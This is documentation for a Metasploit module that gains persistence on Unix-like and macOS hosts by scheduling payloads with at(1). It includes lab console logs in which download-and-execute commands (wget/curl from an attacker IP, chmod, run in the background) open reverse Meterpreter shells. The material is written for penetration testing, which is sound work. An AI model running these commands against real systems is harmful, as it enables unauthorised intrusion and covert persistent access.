Path: blob/master/documentation/modules/exploit/multi/persistence/at.md
21844 views
Vulnerable Application
This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time. It should work out of the box with any UNIX-like operating system with atd running.
Verified on Kali linux and OSX 13.7.4
OSX
In the case of OS X, the atrun service must be launched:
sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
Kali
at isn't installed by default. sudo apt-get install at.
Verification Steps
Start msfconsole
Exploit a box via whatever method
Do:
use exploit/multi/persistence/atDo:
set session #exploit
Options
TIME
When to run job via at(1). Conforms to timespec. Examples can be found in the module's references.
Scenarios
Kali Linux
Initial access vector via web delivery
[*] Processing /home/mtcyr/.msf4/msfconsole.rc for ERB directives. resource (/home/mtcyr/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/home/mtcyr/.msf4/msfconsole.rc)> setg lhost 192.168.10.144 lhost => 192.168.10.144 resource (/home/mtcyr/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp resource (/home/mtcyr/.msf4/msfconsole.rc)> set srvport 8181 srvport => 8181 resource (/home/mtcyr/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/home/mtcyr/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/home/mtcyr/.msf4/msfconsole.rc)> set lport 4545 lport => 4545 resource (/home/mtcyr/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Starting persistent handler(s)... [*] Started reverse TCP handler on 192.168.10.144:4545 [*] Using URL: http://192.168.10.144:8181/PaulWjhBSpRlqAz [*] Server started. [*] Run the following command on the target machine: wget -qO o20dAbhk --no-check-certificate http://192.168.10.144:8181/PaulWjhBSpRlqAz; chmod +x o20dAbhk; ./o20dAbhk& disown [msf](Jobs:2 Agents:0) exploit(multi/script/web_delivery) > [*] 192.168.10.144 web_delivery - Delivering Payload (250 bytes) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 192.168.10.144 [*] Meterpreter session 1 opened (192.168.10.144:4545 -> 192.168.10.144:42442) at 2025-02-06 11:40:00 -0500 [msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... (Meterpreter 1)(/tmp) > sysinfo Computer : 192.168.10.144 OS : Debian (Linux 6.11.2-amd64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux (Meterpreter 1)(/tmp) > background [*] Backgrounding session 1...
Persistence
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp [msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set time "now +10 minutes" time => now +10 minutes [msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set session 1 session => 1 [msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > exploit [*] Command to run on remote host: curl -so ./tmoAoATss http://192.168.10.144:8080/aZRe4yWUN3U2-lDtdsaGlA;chmod +x ./tmoAoATss;./tmoAoATss& [*] Exploit running as background job 2. [*] Exploit completed, but no session was created. [msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > [*] Fetch handler listening on 192.168.10.144:8080 [*] HTTP server started [*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA [*] Started reverse TCP handler on 192.168.10.144:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism [*] Writing payload to /tmp//YneHFC [*] Waiting for execution [*] Meterpreter-compatible Cleaup RC file: /home/mtcyr/.msf4/logs/persistence/192.168.10.144_20250206.4241/192.168.10.144_20250206.4241.rc [msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > date [*] exec: date Thu Feb 6 11:42:44 AM EST 2025 [msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > [*] Client 192.168.10.144 requested /aZRe4yWUN3U2-lDtdsaGlA [*] Sending payload to 192.168.10.144 (curl/8.11.1) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 192.168.10.144 [*] Meterpreter session 2 opened (192.168.10.144:4444 -> 192.168.10.144:36212) at 2025-02-06 11:52:00 -0500 [msf](Jobs:3 Agents:2) exploit(multi/persistence/at) > date [*] exec: date Thu Feb 6 11:52:20 AM EST 2025
OSX 13.7.4
Initial access vector via web delivery
resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111 lhost => 111.111.1.111 resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 8 target => 8 resource (/root/.msf4/msfconsole.rc)> set srvport 8383 srvport => 8383 resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp payload => osx/x64/meterpreter_reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4747 lport => 4747 resource (/root/.msf4/msfconsole.rc)> set URIPATH m URIPATH => m resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Starting persistent handler(s)... [*] Started reverse TCP handler on 111.111.1.111:4747 [*] Using URL: http://111.111.1.111:8383/m [*] Server started. [*] Run the following command on the target machine: curl -sk --output y9D7PFJd http://111.111.1.111:8383/m; chmod +x y9D7PFJd; ./y9D7PFJd& disown [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49164) at 2025-02-21 16:59:10 -0500 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp [msf](Jobs:2 Agents:2) exploit(multi/persistence/at) > sessions -i 1 [*] Starting interaction with 1... (Meterpreter 1)(/Users/macos) > getuid Server username: macos (Meterpreter 1)(/Users/macos) > sysinfo Computer : 20.20.20.21 OS : macOS Ventura (macOS 13.7.4) Architecture : x86 BuildTuple : x86_64-apple-darwin Meterpreter : x64/osx (Meterpreter 1)(/Users/macos) >
Persistence
Already run: sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set session 1 session => 1 [msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set time now +2 minutes time => now +2 minutes [msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set payload payload/osx/x64/meterpreter_reverse_tcp payload => osx/x64/meterpreter_reverse_tcp [msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism [*] Writing payload to /tmp/NBcqC [*] Writing '/tmp/NBcqC' (25 bytes) ... [*] Writing '/tmp/NBcqCmk' (815032 bytes) ... [+] at job created with id: 7 [*] Waiting up to sec for execution [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500